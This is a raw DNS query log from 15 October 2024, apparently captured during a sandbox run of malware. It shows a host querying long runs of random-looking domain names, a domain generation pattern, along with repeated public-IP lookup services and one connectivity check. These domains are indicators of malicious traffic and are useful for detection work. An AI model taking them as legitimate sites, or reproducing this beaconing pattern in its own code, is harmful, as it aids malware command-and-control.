                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.232785940 CEST192.168.11.301.1.1.10xe0f8Standard query (0)cxdmdldfv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.368508101 CEST192.168.11.301.1.1.10x2eaStandard query (0)kiuwsu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.501132011 CEST192.168.11.301.1.1.10x4806Standard query (0)gtpyhzzsrd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.504079103 CEST192.168.11.301.1.1.10x3422Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.639394045 CEST192.168.11.301.1.1.10x2708Standard query (0)hcjufqt.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.892493010 CEST192.168.11.301.1.1.10x37adStandard query (0)pnraibr.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.138835907 CEST192.168.11.301.1.1.10xee01Standard query (0)wljitkmmrsq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.306590080 CEST192.168.11.301.1.1.10xaba6Standard query (0)qrkcmaiuj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.442756891 CEST192.168.11.301.1.1.10xe3b6Standard query (0)uscpqm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.695008993 CEST192.168.11.301.1.1.10x4523Standard query (0)ihpimdxy.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.895473957 CEST192.168.11.301.1.1.10x7b4eStandard query (0)vwddzjzgjozz.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.062268972 CEST192.168.11.301.1.1.10xeec9Standard query (0)yydylwx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.271080017 CEST192.168.11.301.1.1.10xbbbdStandard query (0)vumilurpoatl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.436827898 CEST192.168.11.301.1.1.10x66beStandard query (0)urtmvkx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.573314905 CEST192.168.11.301.1.1.10xfee4Standard query (0)vacovcj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.706295967 CEST192.168.11.301.1.1.10x3b6eStandard query (0)kuceigmowq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.842514992 CEST192.168.11.301.1.1.10x1627Standard query (0)eabmqsykas.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:06.976561069 CEST192.168.11.301.1.1.10x818cStandard query (0)sanyfyesvat.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.112842083 CEST192.168.11.301.1.1.10x952eStandard query (0)yjhofwlx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.433726072 CEST192.168.11.301.1.1.10xa28eStandard query (0)dzxsldit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.600706100 CEST192.168.11.301.1.1.10xa3e0Standard query (0)pxmwgq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.769215107 CEST192.168.11.301.1.1.10x5bc7Standard query (0)xjzmxageg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.905606985 CEST192.168.11.301.1.1.10x66e0Standard query (0)jovzeem.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.208652973 CEST192.168.11.301.1.1.10xac7dStandard query (0)xkntthpajft.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.390111923 CEST192.168.11.301.1.1.10xc445Standard query (0)fiyhxjvgsqb.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.526298046 CEST192.168.11.301.1.1.10xbe29Standard query (0)teyrdsuc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.663937092 CEST192.168.11.301.1.1.10xfb93Standard query (0)xqhrxqoh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.799264908 CEST192.168.11.301.1.1.10x853eStandard query (0)huocyhaakf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.966694117 CEST192.168.11.301.1.1.10x3e16Standard query (0)hagojezpc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.185673952 CEST192.168.11.301.1.1.10xb3e0Standard query (0)ksqeyvwh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.268300056 CEST192.168.11.301.1.1.10x344aStandard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.368194103 CEST192.168.11.301.1.1.10xb2c8Standard query (0)rsgzts.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.576735020 CEST192.168.11.301.1.1.10x8cc9Standard query (0)agvocmd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.709969997 CEST192.168.11.301.1.1.10x6b12Standard query (0)wuzupehil.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.846354961 CEST192.168.11.301.1.1.10x13feStandard query (0)emxwaolfpmi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.982986927 CEST192.168.11.301.1.1.10xb407Standard query (0)wccbxqqoyoy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.150525093 CEST192.168.11.301.1.1.10x42d9Standard query (0)tbyoyvhnfv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.452133894 CEST192.168.11.301.1.1.10x8801Standard query (0)ffxhdkyy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.621052027 CEST192.168.11.301.1.1.10x5bc1Standard query (0)bkeybclmy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.787724972 CEST192.168.11.301.1.1.10x6fddStandard query (0)wtflhxja.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.957937956 CEST192.168.11.301.1.1.10xd0b1Standard query (0)bflthq.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.101537943 CEST192.168.11.301.1.1.10x3258Standard query (0)voqtbrbz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.235846043 CEST192.168.11.301.1.1.10xa037Standard query (0)rjmynwz.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.551903963 CEST192.168.11.301.1.1.10xcd98Standard query (0)fmpsoxtsv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.796868086 CEST192.168.11.301.1.1.10x8d3aStandard query (0)vafyutroz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.995796919 CEST192.168.11.301.1.1.10xe344Standard query (0)nzmtkansch.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.248888969 CEST192.168.11.301.1.1.10x3634Standard query (0)aulokytqd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.563143015 CEST192.168.11.301.1.1.10xb21Standard query (0)igousuia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.737648010 CEST192.168.11.301.1.1.10x98c4Standard query (0)gmwsmkuo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.869527102 CEST192.168.11.301.1.1.10xbc31Standard query (0)ahpirreonw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.037353992 CEST192.168.11.301.1.1.10xa427Standard query (0)vmasuhbokayf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.065087080 CEST192.168.11.301.1.1.10xe3e0Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.210278034 CEST192.168.11.301.1.1.10x93fStandard query (0)horzaw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.346364021 CEST192.168.11.301.1.1.10xa1e6Standard query (0)rboarkztdep.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.479967117 CEST192.168.11.301.1.1.10x6210Standard query (0)nocrzsq.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.731198072 CEST192.168.11.301.1.1.10xa112Standard query (0)vgybvjppdvve.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.899132013 CEST192.168.11.301.1.1.10x8bcbStandard query (0)ohtkxxg.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.034751892 CEST192.168.11.301.1.1.10x9e38Standard query (0)xroqdulwju.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.286571980 CEST192.168.11.301.1.1.10x3101Standard query (0)jmvozxx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.532160997 CEST192.168.11.301.1.1.10xb73Standard query (0)fgryrzlwv.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.837760925 CEST192.168.11.301.1.1.10xea93Standard query (0)dilmlovovkn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.974606991 CEST192.168.11.301.1.1.10xd13dStandard query (0)cqockgwssaik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.112304926 CEST192.168.11.301.1.1.10x65a1Standard query (0)upvncjsnxw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.280862093 CEST192.168.11.301.1.1.10x7c20Standard query (0)tyruco.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.415339947 CEST192.168.11.301.1.1.10x485fStandard query (0)hiuqnlsktyn.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.550473928 CEST192.168.11.301.1.1.10x13a8Standard query (0)agakymgcigsw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.785860062 CEST192.168.11.301.1.1.10x2873Standard query (0)nercgrv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.921432018 CEST192.168.11.301.1.1.10x4b65Standard query (0)wcasugikao.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.093174934 CEST192.168.11.301.1.1.10x25e0Standard query (0)oasiou.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.229320049 CEST192.168.11.301.1.1.10x85cbStandard query (0)qstyvuo.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.427567005 CEST192.168.11.301.1.1.10xfa3Standard query (0)cufjtiyoj.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.646583080 CEST192.168.11.301.1.1.10x2cdfStandard query (0)revndeg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.910707951 CEST192.168.11.301.1.1.10xb175Standard query (0)sxwhjlvgpu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.045496941 CEST192.168.11.301.1.1.10x80faStandard query (0)magkesswuu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.212366104 CEST192.168.11.301.1.1.10xe212Standard query (0)lwsned.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.347815037 CEST192.168.11.301.1.1.10x1350Standard query (0)tdfenz.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.439129114 CEST192.168.11.301.1.1.10x67ceStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.536597013 CEST192.168.11.301.1.1.10xcb8bStandard query (0)jbvspwqifcl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.703058004 CEST192.168.11.301.1.1.10x4098Standard query (0)cewoiimcwmow.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.001287937 CEST192.168.11.301.1.1.10x1852Standard query (0)wrdtfuwqu.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.136564970 CEST192.168.11.301.1.1.10x65b6Standard query (0)mwgyka.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.271790028 CEST192.168.11.301.1.1.10xe866Standard query (0)ciqcimgqce.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.409508944 CEST192.168.11.301.1.1.10x7ac5Standard query (0)pcvsdovpp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.543056011 CEST192.168.11.301.1.1.10x38f3Standard query (0)lpysix.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.678983927 CEST192.168.11.301.1.1.10x92deStandard query (0)ogeltrlncszo.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.860831976 CEST192.168.11.301.1.1.10x9fe7Standard query (0)nxctobwc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.998054028 CEST192.168.11.301.1.1.10xf6aStandard query (0)pnmplsbbix.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.204174042 CEST192.168.11.301.1.1.10xac92Standard query (0)awoumowqyw.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.732544899 CEST192.168.11.301.1.1.10xf9a0Standard query (0)dkuujwkup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:28.868313074 CEST192.168.11.301.1.1.10x949aStandard query (0)zfrhqybxtdeg.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.005860090 CEST192.168.11.301.1.1.10x595eStandard query (0)egvabsriwel.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.176175117 CEST192.168.11.301.1.1.10xf5ebStandard query (0)wgiusyackwya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.314455032 CEST192.168.11.301.1.1.10x1aceStandard query (0)uugiiqomoa.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.449090958 CEST192.168.11.301.1.1.10xb80fStandard query (0)zszagqbuxtu.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.530795097 CEST192.168.11.301.1.1.10x9f67Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.586075068 CEST192.168.11.301.1.1.10x7febStandard query (0)dskcygp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.754332066 CEST192.168.11.301.1.1.10xbb4aStandard query (0)hevkrkpespf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:29.888900995 CEST192.168.11.301.1.1.10xb97aStandard query (0)bmpdmba.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.056337118 CEST192.168.11.301.1.1.10x147eStandard query (0)xssrxcm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.226068974 CEST192.168.11.301.1.1.10xcc5eStandard query (0)fygwaqxgysw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.429393053 CEST192.168.11.301.1.1.10xb9e9Standard query (0)mcuklboyykac.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.565179110 CEST192.168.11.301.1.1.10xbf44Standard query (0)bqwstab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.700186014 CEST192.168.11.301.1.1.10xfb01Standard query (0)wqwmek.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:30.939871073 CEST192.168.11.301.1.1.10xc935Standard query (0)agfqpjgnocco.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.072240114 CEST192.168.11.301.1.1.10xbfa4Standard query (0)jefodozzl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.207207918 CEST192.168.11.301.1.1.10x93b7Standard query (0)gsukcsgacuic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.342436075 CEST192.168.11.301.1.1.10x5666Standard query (0)yzbiymneerj.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.479990005 CEST192.168.11.301.1.1.10x1424Standard query (0)nsnqdit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.776096106 CEST192.168.11.301.1.1.10x3207Standard query (0)kvywsfyj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:31.945789099 CEST192.168.11.301.1.1.10x5b7eStandard query (0)zaplzz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:32.082159996 CEST192.168.11.301.1.1.10x7a92Standard query (0)dwtopsisx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.508886099 CEST192.168.11.301.1.1.10xb18cStandard query (0)iilirx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.716840029 CEST192.168.11.301.1.1.10x9ef3Standard query (0)zmzaasi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:35.885670900 CEST192.168.11.301.1.1.10xed2Standard query (0)rozslge.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.019810915 CEST192.168.11.301.1.1.10x8c25Standard query (0)kgswyswsms.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.188375950 CEST192.168.11.301.1.1.10x481bStandard query (0)oasmcuggak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.324055910 CEST192.168.11.301.1.1.10x5470Standard query (0)ravbrdlcxepx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.459127903 CEST192.168.11.301.1.1.10x996cStandard query (0)mgjyyduwwax.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.681737900 CEST192.168.11.301.1.1.10x9104Standard query (0)fduvhdv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.814660072 CEST192.168.11.301.1.1.10x3db3Standard query (0)cywqlsx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:36.919897079 CEST192.168.11.301.1.1.10x4be0Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.031027079 CEST192.168.11.301.1.1.10xb159Standard query (0)egwkmsqm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.198709965 CEST192.168.11.301.1.1.10xfcc1Standard query (0)osxpaprezyg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.410093069 CEST192.168.11.301.1.1.10xbfa1Standard query (0)ovmlyfsbvepf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.550668955 CEST192.168.11.301.1.1.10xe8fcStandard query (0)xvhkkg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.687758923 CEST192.168.11.301.1.1.10x3d81Standard query (0)lozupqunl.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:37.899818897 CEST192.168.11.301.1.1.10x2919Standard query (0)rafoaiduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.035335064 CEST192.168.11.301.1.1.10x2034Standard query (0)xixshgqsnxdm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.172792912 CEST192.168.11.301.1.1.10x4927Standard query (0)pspexyjytqa.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.310612917 CEST192.168.11.301.1.1.10x87c5Standard query (0)ktljlgcrkwv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.477615118 CEST192.168.11.301.1.1.10x8ab6Standard query (0)flmbvdibho.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.616976976 CEST192.168.11.301.1.1.10x73b8Standard query (0)nwtltucdgxci.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:38.824876070 CEST192.168.11.301.1.1.10x739Standard query (0)gemckmkqmeim.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:41.998590946 CEST192.168.11.301.1.1.10xbfe3Standard query (0)qycosiiiykcy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.135379076 CEST192.168.11.301.1.1.10x62cdStandard query (0)zpryru.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.271543026 CEST192.168.11.301.1.1.10xede6Standard query (0)lwlihog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.410033941 CEST192.168.11.301.1.1.10x529bStandard query (0)wuhkrrpew.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.668812037 CEST192.168.11.301.1.1.10xb5c0Standard query (0)bonydwj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.804936886 CEST192.168.11.301.1.1.10x7368Standard query (0)www.bbc.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.837740898 CEST192.168.11.301.1.1.10xc1e0Standard query (0)gifjwknnsa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:42.972775936 CEST192.168.11.301.1.1.10xb508Standard query (0)uagoeg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.236644030 CEST192.168.11.301.1.1.10x1068Standard query (0)hosplypcd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.403394938 CEST192.168.11.301.1.1.10x1933Standard query (0)kepiqy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.571538925 CEST192.168.11.301.1.1.10xc498Standard query (0)skpxwstkygr.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.705096006 CEST192.168.11.301.1.1.10xaa31Standard query (0)jcyusd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:43.926253080 CEST192.168.11.301.1.1.10x8a09Standard query (0)ekojonrx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.095637083 CEST192.168.11.301.1.1.10x91a7Standard query (0)bgiqmzak.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.305754900 CEST192.168.11.301.1.1.10x5b62Standard query (0)pqdwhoyqfyr.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.440424919 CEST192.168.11.301.1.1.10xc8eStandard query (0)qledvhmwtgj.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.606043100 CEST192.168.11.301.1.1.10x2cafStandard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.649853945 CEST192.168.11.301.1.1.10xf11eStandard query (0)cvpprc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.785608053 CEST192.168.11.301.1.1.10xc50Standard query (0)zwphhjux.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:44.922159910 CEST192.168.11.301.1.1.10x54b4Standard query (0)mepqfzed.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.060472012 CEST192.168.11.301.1.1.10x63d2Standard query (0)khhwhgysu.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.195957899 CEST192.168.11.301.1.1.10xbd3dStandard query (0)tjzaiyhoayd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.330426931 CEST192.168.11.301.1.1.10xa527Standard query (0)wcikfayz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.541280031 CEST192.168.11.301.1.1.10xb7a0Standard query (0)ftyayhvid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.711361885 CEST192.168.11.301.1.1.10x9bcbStandard query (0)htcdxnm.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:45.744759083 CEST192.168.11.301.1.1.10xd187Standard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:48.947699070 CEST192.168.11.301.1.1.10x78b0Standard query (0)eumiqrniuuj.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.083225965 CEST192.168.11.301.1.1.10x968eStandard query (0)ukamqol.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.251451969 CEST192.168.11.301.1.1.10x201eStandard query (0)kyszrzmuawj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.418332100 CEST192.168.11.301.1.1.10x4f65Standard query (0)gvsvxirhjhmc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.605550051 CEST192.168.11.301.1.1.10x71e3Standard query (0)zavcnar.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.739710093 CEST192.168.11.301.1.1.10x4c7dStandard query (0)fdnkvsylwiz.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:49.949956894 CEST192.168.11.301.1.1.10xcbbbStandard query (0)otmccjnozm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.118576050 CEST192.168.11.301.1.1.10x5689Standard query (0)umcaqskg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.252131939 CEST192.168.11.301.1.1.10xbb57Standard query (0)ttnbfk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.420017958 CEST192.168.11.301.1.1.10xd50bStandard query (0)ryxedahgvtlu.netA (IP address)IN (0x0001)false
